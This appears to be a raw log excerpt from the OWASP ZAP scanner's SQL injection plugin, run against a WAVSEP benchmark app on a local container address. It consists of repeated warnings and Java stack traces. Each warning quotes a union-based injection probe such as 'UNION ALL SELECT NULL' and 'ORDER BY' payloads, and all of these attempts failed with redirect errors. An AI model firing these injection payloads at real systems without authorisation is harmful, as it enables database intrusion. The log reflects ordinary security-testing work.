org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680419 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 5410#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) ORDER BY 5410# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680421 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680422 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680423 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680424 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680425 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680427 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680428 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680429 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680430 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680431 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680433 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680434 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 6919#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 6919# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at 